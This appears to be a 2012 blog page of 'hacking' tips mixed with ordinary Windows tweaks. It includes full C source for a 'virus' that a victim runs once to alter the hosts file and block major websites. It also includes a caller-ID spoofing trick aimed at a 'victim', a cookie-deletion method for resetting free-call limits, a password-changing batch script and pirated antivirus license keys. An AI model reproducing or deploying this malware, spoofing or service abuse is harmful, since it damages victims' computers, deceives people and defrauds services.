Most viewed

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

7 Jun 2012

How to make free calls all over the world? for unlimited time

  Hi friends this is a post about making free calls all over the world for unlimited time to any where on the world. Follow the steps given enjoy. Pls comment


STEP 1:
   Open the site evaphone.ru then become a member in it. Then u can see that u ill have 2 free calls




STEP 2:
  Now you have to type in the phone number with prefixed country code




STEP 3:
   Hit call button you can see that the call directs to your phone, It depends on the net speed.




STEP 4:
   Now after attending the call your timer will start as you can see the time goes down




STEP 5: 
   After disconnecting the call you will have only 1 call out of 2 calls.


STEP 6:
  This step is more important to make that (1 out of 2) as (2 out of 2) again
  Now hit  CONTROL+SHIFT+J (only for chrome users) you will see a tab opening in the bottom




STEP 7:
  Go to the cookies list and drop down the list




STEP 9:
  Delete the cookies one by one altogether permanently

STEP 9:
  Now restart your modem and refresh the page and see the magic happens








Hope this will be use full for you.:D elektronology 

How to download torretz file from blocked site



 Hi friends, am going you to show how to open blocked sites of torrentz and download the torrentz file step by step




STEP 1:
    Go to the tor download page and download the tor browser 







STEP 2:
    Open the downloaded file and then it will start extracting in the same directory then open the extraced tor browser.








STEP 3:
   Now you will see this tab after opening TOR.



STEP 4:
   Tor will open mozilla by default like this page.


STEP 5: 
     Now open the torrentz.eu site and search the file you want


STEP 6:
    After that in pirate bay to download the file right click on the get torrent file  link then click copy link 


STEP 7:
    Now open the torrenz software and click in file add torrentz by URL






STEP 8:
       Now paste in the copied link and hit ENTER




STEP 9: 
  See download started


























5 Jun 2012

License Keys of Avira Products 2012






Features:
    • Continuous monitoring of any attempted access to files
    • Standard and extended protection mode
    • Integration with Windows UAC allowing to carry out tasks requiring administrator right
    • Web browser-integrated Toolbar
    • Built-in quarantine to isolate suspicious files
    • Detecting hidden malicious software installed on the computer
    • Direct access to detailed information about viruses and other harmful programs detected
    • Scheduled updates and scans
    • Heuristic detecting technologies
    • Detecting of all kinds of archives
    • Synchronous multithread scan of multiple files

    Download here


Password: elektronology

2 Jun 2012

Remove shortcut arrow from desktop icons completely


ELEKTRONOLOGY
ELEKTRONOLOGY ICON REMOVER

To remove shortcut arrow from desktop icons in any type of document:
a) Perform instructions described under ‘Remove shortcut arrow from desktop icons’. For your convenience, steps 1 to 3 are reported here.
b) Perform instructions described under ‘Remove shortcut arrow from desktop icons (2)’. For your convenience, steps 4 and 5 are reported here.
c) And finally, do the same with conferencelink, docshortcut, internetshortcut and wshfile.
So, here is a summary of all actions:
1. Start regedit.
2. Navigate to HKEY_CLASSES_ROOT\lnkfile
3. Delete the IsShortcut registry value.
4. Navigate to HKEY_CLASSES_ROOT\piffile
5. Delete the IsShortcut registry value.
6. Navigate to HKEY_CLASSES_ROOT\ConferenceLink
7. Delete the IsShortcut registry value.
8. Navigate to HKEY_CLASSES_ROOT\DocShortCut
9. Delete the IsShortcut registry value.
10.Navigate to HKEY_CLASSES_ROOT\InternetShortcut
11. Delete the IsShortcut registry value.
12. Navigate to HKEY_CLASSES_ROOT\WSHFile
13. Delete the IsShortcut registry value.
14. Close regedit.
Logoff and… Enjoy!
Note : Please note that in some cases deactivating the arrow for *.LNK files might lead to duplicate items in the Explorer Context menu.

8 May 2012

Windows password changing



@echo off
title Elektronology
Code:
@echo off

cls
set /p CP=Would you like to change the password of ANY user account on your pc? (Y/N):
IF '%CP%' == 'Y' GOTO CP
IF '%CP%' == 'y' GOTO CP
IF '%CP%' == 'N' GOTO DCP
IF '%CP%' == 'n' GOTO DCP

:CP
cls
set /p UN=What User Account Do you want to change the password for? (Type a user Name. For a list of users type UL.):
IF '%UN%' == 'UL' Goto NETUSER

cls
set /p AYS=Are You Sure you Want to Change the password of the account %UN%. (Y/N)
IF '%AYS%' == 'Y' goto CPY
IF '%AYS%' == 'y' goto CPY
IF '%AYS%' == 'N' Goto DCP
IF '%AYS%' == 'n' Goto DCP

:CPY
cls
Net User %UN% *
pause
exit

:DCP
cls
Echo The password will not be changed.
pause
exit

:NETUSER
Net User
pause
Goto :CP

7 May 2012

Improve Windows-XP Shutdown Speed



2) Type ‘Regedit’ and click ok
3) Find ‘HKEY_CURRENT_USERControl PanelDesktop’
4) Select ‘WaitToKillAppTimeout’
5) Right click and select ‘Modify’
6) Change the value to ’1000′
7) Click OK
8. Now select ‘HungAppTimeout’
9) Right click and select ‘Modify’
10) Change the value to ’1000′
11) Click ‘OK’

How do I create shutdown shortcuts in Microsoft Windows 7?




Creating a shortcut

Creating a shortcut should be familiar to almost everyone, but we will walk through the process just for clarity. There are other ways to accomplish this task, but this is my preferred method. First, right-click on a clear spot on the desktop and navigate to New | Shortcut, as shown in Figure A.

Figure A

Navigate the menu to create a new shortcut.
When you click the Shortcut menu item, you will arrive at the input screen shown inFigure B. This is where you will enter the specific command strings to make your new shortcut do what you want it to do.

Figure B

Enter the command for your new shortcut.
For our example, we will enter the specific command that will shut down a Windows PC. Type the following command into the box and then click Next.
Shutdown.exe -s -t 00
The next screen (Figure C) asks you to name the shortcut. I suggest you name the shortcut to correspond to the action it will perform. In this case, we name it Shutdown.

Figure C

Give it an appropriate name.

New icon

Technically, you could stop here, but I prefer to give these shortcuts an icon that will help me remember what it is they do. In Windows 7, changing an icon is similar to how you changed icons in previous versions of the operating system.
Right-click on the icon in question to get the context menu shown in Figure D and then navigate to the Properties menu item.

Figure D
Find Properties on the menu.
From the Properties control panel, shown in Figure E, select the Change Icon button.

Figure E

Select Change Icon.
The next screen (Figure F) will show you a list of potential icons. Choose the one you want to use and click the OK button twice.

Figure F

Choose your icon and click OK.
You should now have a new shortcut on your desktop. When you click the shortcut, your PC will shut down, so make sure you save your work before you test it.

4 Mar 2012

A Virus Program to Block Websites


Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IEor Firefox. So once blocked, the site will not appear in any of the browser program.
Here is the sourcecode of the virus.
#include<stdio.h>
#include<dos.h>
#include<dir.h>
char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}
Testing
1. To test, run the compiled module. It will block the sites that is listed in the source code.
2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
3. To remove the virus type the following the Run.
%windir%\system32\drivers\etc
4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this
127.0.0.1                                google.com
5. Delete all such entries which contain the names of blocked sites.

Download YouTube Videos: Easiest Way


Download YouTube VideosYouTube is undoubtedly the most preferred website to share and watch favorite videos. Most users prefer to watch the videos online, while a few others like me, would like to download them so that, they can be saved and retained. Well, if you are one among those few who would like to download the videos from YouTube, then here is a way to do that.
In fact, there are many ways to download videos from YouTube, but here in this post, I would like to share with you one of the easiest way to do that. This can be done as follows:
1. Download and install the latest version of Internet Download Manager.
Internet Download Manager is a great add-on for your web browser which increases the download speed by 5 times. It also helps you to pause/resume and schedule your downloads. It has got a great interface and is user friendly. It works with most of the browsers including IE, Firefox, Chrome, Safari and Opera.
2. After you complete the installation, just open your browser and start searching for your favorite video on YouTube. You will see the download button on top of the video using which you can download it instantly.
3. Click on the “Download this Video” button to save the video onto your computer. The downloaded video will be in the flash video format (.flv).
4. You can use VLC Player to play the downloaded video or use SUPER to convert it to your desired format.
By using this trick, you can download almost all the buffering content on the Internet including videos from MySpace and Google. I hope you like this small post. Don’t forget to pass your comments

How to Retrieve Clipboard History in Windows


Retrieve clipboard history using alternative clipboard managersEver copied a code snippet or text from the web and forgot to paste it before you copied something else? Well, all of us will have an experience of something like this, where we want to desperately retrieve those information that was once copied to the clipboard. But since Windows clipboard will only remember the last item that was copied onto it, it would seem impossible to recover the information that was copied earlier. However, this problem can be solved using an alternative clipboard manager in place of the default one.
In this post you will find a few such alternative clipboard managers for Windows using which it would be possible to save and retrieve every piece of information that was copied to the clipboard. Here’s a quick list:

1. Clipdiary

How to Retrieve Clipboard HistoryThis tool is a powerful clipboard manager which will store every piece of information that was copied to the clipboard including text, images or any other file. Clipdiary automatically loads upon Windows startup and maintains a database to store the history of all copied items.
This makes it possible to retrieve the information that was once copied to the clipboard, be it the last hour or the last week. Clipdiary is a shareware tool which comes with a 30 day fully functional evaluation period.

2. ClipMagic

ClipMagic is similar to Clipdiary but includes a few extra features that could seem handy for advanced users. The following are some of the extra features of ClipMagic that are not present in Clipdiary:
  • Categorize/organize your clips. You can also create filters/rules for your incoming clips
  • You can store/categorize your ideas to research fast
  • Assign often used text like email signatures to hotkeys

3. Ditto

Ditto is a powerful alternative to the default Windows clipboard manager which is an open source tool. It keeps track of all the copied items such as text, images and other files so that you can retrieve them whenever necessary. The following are some of the highlights of Ditto:
  • Assign hotkeys to frequently used clippings
  • Search and organize the clippings based on task or project
  • Supports unicode so that you can copy foreign and non-standard characters without any issues
  • Get a preview of all the copied items including thumbnails of images just by pressing the assigned hotkey
  • Ditto comes as a freeware so that you can enjoy all of it’s features free of cost
Even though Ditto is a freeware, it is still comparable to the two shareware tools discussed earlier. So in my opinion Ditto is always the first choice. You may still download and try all the three and keep the one that you like!
I hope you enjoyed this post! Post your feedback through comments. 

Useful Google Talk Bots That You Must Add as Friend

This summary is not available. Please click here to view the post.

How to call your friends with their own number

With this mobile hack, you can call your friends with their own mobile number… meaning by, they will see their own number calling them. Just follow the guidelines I have mentioned in this mobile hack article.

1. Go to http://www.mobivox.com and register there for free account.

2. During registration, remember to insert Victim mobile number in “Phone number” field as shown below.



3. Complete registration and confirm your email id and then login to your account. Click on “Direct WebCall”



4. You will arrive at page shown below. In “Enter a number” box, select your country and also any mobile number(you can enter yours). Now, simply hit on “Call Now” button to call your friend with his own number.



5. That’s it. Your friend will be shocked to see his own number calling him.

Thus, use this to surprise and shock your friends. This mobile hack is free. So, you don’t need to lose a buck. Simply register and you’ll be able to perform this mobile hack. This mobile hack is available for almost all countries and all cell phones network providers

Enjoy mobile hack…

28 Nov 2011

How to Hide Data in Image, Audio & Video Files: Steganography




         Ever wondered to know how to hide secret messages in images, audio and video files? Well, in this post I will take you through a concept called steganography using which, it is possible to hide your secret information in image files, songs or any other file of your choice. At the end of this post, you can also download free stegnographic tools and start hiding your data.
What is Steganography?

Steganography is a means of obscuring data where secret messages are hidden inside computer files such as images, sound files, videos and even executable files so that, no one except the sender and the receiver will suspect the existence of stealth information in it. Steganography may also involve the usage of cryptography where the message is first encrypted before it is concealed in another file. Generally, the messages appear to be something else such as an image, sound or video so that the transfer of secret data remains unsuspected.

                          The main advantage of steganography over other methods such as cryptography is that, it will not arose suspicion even if the files fall in the hands of a third party. Unlike cryptographic messages, stegnographic messages will no way attract the attention of a third party by themselves. Thus stegnanography has an upper hand over cryptography as it involves both encryption and obscurity.
What are the Applications of Steganography?

Steganography is mainly used to obscure confidential information/data during storage or transmission. For example, one can hide a secret message in an audio file and send this to another party via email instead of sending the message in the textual format. The receiver on the other end will decrypt the hidden message using the private decryption key. In a worst case scenario, even if a third party does manage to gain access to the email, all he can find is the audio file and not the hidden data inside it. Other usage of steganography include digital watermarking of images for reasons such as copyright protection.

                                 Eventhough steganography has many useful applications, some may use this technique for illegitimate purposes such as hiding a pornographic content in other large files. Roumors about terrorists using steganography for hiding and communicating their secret information and instructions are also reported. An article claiming that, al-Queda had used steganography to encode messages in images and transported them via e-mails, was reported by New York Times, in October 2001.
How do Steganography Tools Work?

Stegnography tools implement intelligent algorithms to carefully embed the encrypted text messages or data inside other larger files such as an image, audio, video or an executable file. Some tools will embed the encrypted data at the end of another file so that there will be enough room for storing larger data.

There are many steganography tools available online but only a few are able to work flawlessly. I did not find any tool that worked perfectly on both small and large data. However I have managed to develop my own tool that can work perfectly on all types of files and all size of data. The tool is called “Stego Magic“. You can download it from the following link.


Download Stego Magic
Download StegoMagic.zip



                                        The zip file contains two versions of Stego Magic: One for encrypting the text messages and the other for encrypting binary files. StegoMagic_TXT can be used to hide text messages in other files such as an image or a sound file. StegoMagic_BIN can be used to hide one binary file in another such as an executable file inside an image or an image inside a video file.

With Stego Magic, there is no limitation on the size and type of the file that you are intending to hide. For example, you can hide a video of size 1 GB in an image of size 1 MB or hide an executable file inside a WORD document. The tool is pretty straightforward to use and requires no special understanding of the concept.

At the end of the encryption process, a secret decryption key will be generated and the same is required during the decryption process.
How to Use Stego Magic?

Suppose you want to hide a text message inside a JPG file:

1. Place the JPG and the text file (.txt) in the same folder as that of StegoMagic_TXT.exe

2. Run StegoMagic_TXT.exe and follow the screen instructions to embed the text message inside the JPG image.

3. Note down the secret decryption key.

Now you can send this image to your friend via email. To decrypt the hidden message, your friend should load this JPG file onto the Stego Magic tool and use the secret decryption key.

17 Nov 2011

How to protect USB Pendrives/Flashdrives from VIRUS ?





Lets Protect USB Pendrives / flash drives from Viruses.

Most often our system get infected with virus soon after a USB pendrive has been plugged in. These days it is so easy to get infected by viruses by plugging in a pendrive to your system from unknown source (may be your friends one or your college desktops).

Not all the security programs can defend your pc against the virus attacks carried out through pendrives. But if we can take necessary steps, then we can be safe from such viruses, worms and spywares spreading through pendrives/ flash drives.

So here are some software’s that can efficiently protect your system and pendrive from unknown threats ad viruses.
1.USB Write Protector

It is a software that can help you in write protecting your Pendrive. USB Write Protector allows only to read the data from the pendrive but it wont permit to write data into the pendrive. This is really useful if you take your pendrive to plug on to your friends or relatives pc, as most of the virus enter the pendrive unknowingly. USB Write Protector is a small program, around 190kb in size.

ETY

                     


USB Write Protector

The program doesn’t need any installation and can be directly run from the location. On running the program the window just shows up with just two option to enable write Protection in your Pendrive/ USB Flash Drive and to Turn Off the USB Write Protection. Its that simple. You just need to pick the option and click on OK.
Download
 

Based on your view




You have to try this

This is trending now #